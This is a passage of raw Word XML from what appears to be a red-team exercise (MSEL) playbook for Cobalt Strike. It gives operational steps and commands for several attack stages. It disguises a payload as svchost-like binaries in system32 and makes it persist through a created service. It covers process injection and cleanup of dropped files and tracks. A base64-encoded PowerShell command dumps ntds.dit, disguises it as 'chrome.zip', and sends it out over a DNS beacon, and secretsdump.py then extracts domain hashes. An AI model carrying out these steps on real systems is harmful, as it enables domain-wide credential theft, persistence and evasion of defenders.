          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Generate </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CBD8B1" w14:textId="02DA8B5A" w:rsidR="00EF0558" w:rsidRDefault="00EF0558" w:rsidP="00EF0558">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Save payload as a</w:t>
      </w:r>
      <w:r w:rsidR="00B23C44">
        <w:t xml:space="preserve"> discrete name to execute under (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00B23C44">
        <w:t>i.e.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00B23C44">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002D2C8E">
        <w:t>svchost.exe,</w:t>
      </w:r>
      <w:r w:rsidR="00E1451C">
        <w:t xml:space="preserve"> hpupdate.exe, puppet.exe, puppetmaster.exe, VMwareool.exe</w:t>
      </w:r>
      <w:r w:rsidR="002D2C8E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B23C44">
        <w:t>etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1520BD30" w14:textId="1880D741" w:rsidR="00EF0558" w:rsidRDefault="00EF0558" w:rsidP="00EF0558">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Store in </w:t>
      </w:r>
      <w:r w:rsidR="00A41411">
        <w:t>…/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A41411">
        <w:t>cobaltstrike</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A41411">
        <w:t>/Payloads/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CEA4AB" w14:textId="5433F756" w:rsidR="00A41411" w:rsidRDefault="00A41411" w:rsidP="00A41411">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Navigate to C:\Windows\system32 and deliver the created payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D516001" w14:textId="0A2D0C39" w:rsidR="00B23C44" w:rsidRDefault="00B23C44" w:rsidP="00B23C44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Deliver via previous MSEL’s domain controller cracking</w:t>
      </w:r>
      <w:r w:rsidR="002D2C8E">
        <w:t>/ chain of cobalt strike beacons</w:t>
      </w:r>
      <w:r w:rsidR="00E1451C">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6069A8C0" w14:textId="1796C504" w:rsidR="00E1451C" w:rsidRDefault="00E1451C" w:rsidP="00E1451C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Assuming cobalt strike we have used the upload command. Metasploit has similar mechanics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E10DDDB" w14:textId="538B6783" w:rsidR="008C4EFE" w:rsidRDefault="008C4EFE" w:rsidP="00E1451C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The end state is to have the payload in system32, the CS command is:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260EFD22" w14:textId="3B258541" w:rsidR="008C4EFE" w:rsidRPr="008C4EFE" w:rsidRDefault="008C4EFE" w:rsidP="008C4EFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="3600"/>
      </w:pPr>
      <w:r w:rsidRPr="008C4EFE">
        <w:t>Upload /root/Desktop/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008C4EFE">
        <w:t>cobaltstrike</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008C4EFE">
        <w:t>/Payloads/[payload.exe]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DCF4BC" w14:textId="591D99DE" w:rsidR="005E34E7" w:rsidRDefault="005E34E7" w:rsidP="00F51519">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Exfiltration of required data</w:t>
      </w:r>
      <w:r w:rsidR="00E041C2">
        <w:t xml:space="preserve"> (Work in Progress)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292FC60C" w14:textId="210557D9" w:rsidR="00B23C44" w:rsidRDefault="00B23C44" w:rsidP="00567924">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Detonate payload to establish</w:t>
      </w:r>
      <w:r w:rsidR="008C4EFE">
        <w:t>ed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the beacon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59252D3E" w14:textId="33CA39FD" w:rsidR="00A955FE" w:rsidRDefault="00A955FE" w:rsidP="00A955FE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Thorough CS beacon:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303BD31B" w14:textId="4BF87B3B" w:rsidR="00567924" w:rsidRDefault="00A955FE" w:rsidP="00A955FE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Shell </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00567924">
        <w:t>sc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00567924">
        <w:t xml:space="preserve"> create </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00567924">
        <w:t>scvhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00567924">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00567924">
        <w:t>binpath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00567924">
        <w:t xml:space="preserve">= "cmd.exe /k </w:t>
      </w:r>
      <w:r w:rsidR="00562FB3">
        <w:t>C:\windows\system32</w:t>
      </w:r>
      <w:r w:rsidR="008C4EFE">
        <w:t>\[payload.exe]</w:t>
      </w:r>
      <w:r w:rsidR="00567924">
        <w:t xml:space="preserve">" start="auto" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6688AC78" w14:textId="43D28A69" w:rsidR="00567924" w:rsidRDefault="00A955FE" w:rsidP="00A955FE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Shell </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00567924">
        <w:t>sc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00567924">
        <w:t xml:space="preserve"> start </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00567924">
        <w:t>scvhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6EA3D93F" w14:textId="3C05F76D" w:rsidR="0067170D" w:rsidRDefault="0067170D" w:rsidP="0067170D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Inject into less risky process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF1D5AE" w14:textId="62C1D1EF" w:rsidR="008C4EFE" w:rsidRDefault="008C4EFE" w:rsidP="008C4EFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Right click beacon in the center window of the cs client and navigate to explore </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>-&gt; process list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248D9532" w14:textId="77777777" w:rsidR="008C4EFE" w:rsidRDefault="008C4EFE" w:rsidP="0067170D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Click the processes tab corresponding to your beacon in the CS client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430B451E" w14:textId="1EB21190" w:rsidR="0067170D" w:rsidRDefault="00407789" w:rsidP="0067170D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Inside the processes tab spawned f</w:t>
      </w:r>
      <w:r w:rsidR="0067170D">
        <w:t>ind a safe svchost.exe to inject into</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E186114" w14:textId="66A1575C" w:rsidR="00A955FE" w:rsidRDefault="00A955FE" w:rsidP="00A955FE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Find a PID around 800-1500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A1471A" w14:textId="0BB853E5" w:rsidR="008C4EFE" w:rsidRDefault="008C4EFE" w:rsidP="00A955FE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Click said named process and then press inject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39773A5B" w14:textId="071942B6" w:rsidR="00407789" w:rsidRDefault="00407789" w:rsidP="00A955FE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Attach to the established DNS beacon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB8DA6F" w14:textId="38A287A0" w:rsidR="008C4EFE" w:rsidRDefault="008C4EFE" w:rsidP="00A955FE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>A new beacon should open up in the client. Interact with the beacon to load metadata. The process and PID should match the process you injected into.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F159DEB" w14:textId="64B0C686" w:rsidR="0067170D" w:rsidRDefault="0067170D" w:rsidP="0067170D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kill the </w:t>
      </w:r>
      <w:r w:rsidR="008C4EFE">
        <w:t>initial</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> process</w:t>
      </w:r>
      <w:r w:rsidR="008C4EFE">
        <w:t xml:space="preserve"> and service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05771A16" w14:textId="34AF0533" w:rsidR="008C4EFE" w:rsidRDefault="00FE30E9" w:rsidP="008C4EFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Powerpick</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> stop-service -force </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>scvhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="396745ED" w14:textId="4D277795" w:rsidR="00FE30E9" w:rsidRDefault="00FE30E9" w:rsidP="008C4EFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Powerpick</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> stop-process -id [PID indicated next to beacon in CS client] -Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8075C8" w14:textId="77777777" w:rsidR="0067170D" w:rsidRDefault="0067170D" w:rsidP="0067170D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Remove dropped .exe </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0733293D" w14:textId="7E235C60" w:rsidR="0067170D" w:rsidRDefault="0067170D" w:rsidP="0067170D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Delete dropped .ex</w:t>
      </w:r>
      <w:r w:rsidR="00FE30E9">
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9BD97E" w14:textId="2FB0D2B4" w:rsidR="00FE30E9" w:rsidRDefault="00FE30E9" w:rsidP="00FE30E9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Powerpick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C:\Windows\System32\[payload.exe]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638911E5" w14:textId="1E2D2B66" w:rsidR="0067170D" w:rsidRDefault="0067170D" w:rsidP="00A955FE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Clean</w:t>
      </w:r>
      <w:r w:rsidR="00A955FE">
        <w:t>ing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> up of any </w:t>
      </w:r>
      <w:r w:rsidR="00A955FE">
        <w:t xml:space="preserve">additional </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">tracks (i.e., Windows Event Logs, prefetch, etc.) </w:t>
      </w:r>
      <w:r w:rsidR="00A955FE">
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r>
        <w:t>up to team discretion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EE53C2" w14:textId="52A81E13" w:rsidR="00C858B7" w:rsidRDefault="0067170D" w:rsidP="00C858B7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Preform actual exfil</w:t>
      </w:r>
      <w:r w:rsidR="001153A8">
        <w:t xml:space="preserve">. These steps are FYSA. All you need to do is run the entire bolded command starting with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001153A8">
        <w:t>powerpick</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001153A8">
        <w:t xml:space="preserve"> and ending in | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001153A8">
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001153A8">
        <w:t xml:space="preserve"> through your beacon to be successful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131AD060" w14:textId="77777777" w:rsidR="00D60ACB" w:rsidRDefault="00C858B7" w:rsidP="008F1AA3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">On a windows DC for testing, create the encoded commands by performing the following in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17406DCF" w14:textId="77777777" w:rsidR="00D60ACB" w:rsidRDefault="00C858B7" w:rsidP="00541FF1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Create a variable for the commands called "string" to encode:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435B0836" w14:textId="77777777" w:rsidR="00D60ACB" w:rsidRDefault="00C858B7" w:rsidP="004F3CFD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>$string = '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ntdsutil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> "activate instance </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ntds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ifm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> "create Full C:\users\public\desktop\chrome" q </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>q</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>q;Compress-Archive</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -Path "C:\users\public\desktop\chrome" -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DestinationPath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> "C:\users\public\desktop\chrome";</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ri</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> c:/users/public/desktop/chrome -R'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EEDD58" w14:textId="77777777" w:rsidR="00D60ACB" w:rsidRDefault="00C858B7" w:rsidP="00D60ACB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Encode the string variable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0334CB81" w14:textId="223EC0B5" w:rsidR="00C858B7" w:rsidRDefault="00C858B7" w:rsidP="00C858B7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>$code = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($string))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1980B99E" w14:textId="77777777" w:rsidR="00D60ACB" w:rsidRDefault="00C858B7" w:rsidP="00C858B7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Get encoded command string by running</w:t>
      </w:r>
      <w:r w:rsidR="00D60ACB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>$code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD224EF" w14:textId="7447969D" w:rsidR="00C858B7" w:rsidRDefault="00C858B7" w:rsidP="00C858B7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Copy encoded string and paste into the following command between the ''[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('')) | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4FB6FBBA" w14:textId="00C738D7" w:rsidR="0013077A" w:rsidRDefault="00C858B7" w:rsidP="00746564">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Should look something like this (the encoded below is already confirmed to perform the required actions mentioned above</w:t>
      </w:r>
      <w:r w:rsidR="00A955FE">
        <w:t xml:space="preserve"> when run through </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A955FE">
        <w:t>powerpick</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006C4EDB">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A51938B" w14:textId="42CD5033" w:rsidR="0013077A" w:rsidRPr="001153A8" w:rsidRDefault="0013077A" w:rsidP="00C858B7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001153A8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>powerpick</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001153A8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('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')) | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001153A8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4E67BBFD" w14:textId="7CA3B48B" w:rsidR="0013077A" w:rsidRDefault="0013077A" w:rsidP="00C858B7"/>
    <w:p w14:paraId="2F523E52" w14:textId="77777777" w:rsidR="0013077A" w:rsidRDefault="0013077A" w:rsidP="00C858B7"/>
    <w:p w14:paraId="1FE3528C" w14:textId="49A307A9" w:rsidR="00C858B7" w:rsidRDefault="00C858B7" w:rsidP="00D60ACB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">This will use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ntdsutil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to dump the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ntds.dit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to c:\users\public\desk</w:t>
      </w:r>
      <w:r w:rsidR="008C0D25">
        <w:t>top\chrome.</w:t>
      </w:r>
      <w:r>
        <w:t>zip the contents to a file called c:\users\public\desktop\chrome.zip, remove the directory created by the extraction c:\users\public\desktop\chrome</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044E68F7" w14:textId="2C89CDB2" w:rsidR="00C858B7" w:rsidRDefault="00C858B7" w:rsidP="00D60ACB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>copy the c:\users\public\desktop\chrome.zip through the DNS Beacon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA4EDE5" w14:textId="57C70908" w:rsidR="00D60ACB" w:rsidRDefault="00D60ACB" w:rsidP="00D60ACB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>download C:\users\public\desktop\chrome.zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5DDDA6" w14:textId="09B26455" w:rsidR="00C858B7" w:rsidRDefault="00C858B7" w:rsidP="00D60ACB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Then remove the chrome.zip file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45441897" w14:textId="0C028AEF" w:rsidR="00C858B7" w:rsidRDefault="00D60ACB" w:rsidP="00C858B7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>rm C:\users\public\desktop\chrome.zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3480FDF4" w14:textId="4DC0696D" w:rsidR="00A955FE" w:rsidRDefault="009B4FED" w:rsidP="00A955FE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">unzip chrome.zip and use secretsdump.py to extract hashes </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699969DD" w14:textId="410A60B2" w:rsidR="009B4FED" w:rsidRDefault="009B4FED" w:rsidP="009B4FED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>python3 secretsdump.py –</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ntds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /root/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cobaltstrike</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/downloads/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ndts.dit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> –system /root/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cobaltstrike</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/downloads/system –hashes LMHASH:NTHASH LOCAL –</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>outputfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hashesfromdc</w:t>
      </w:r>
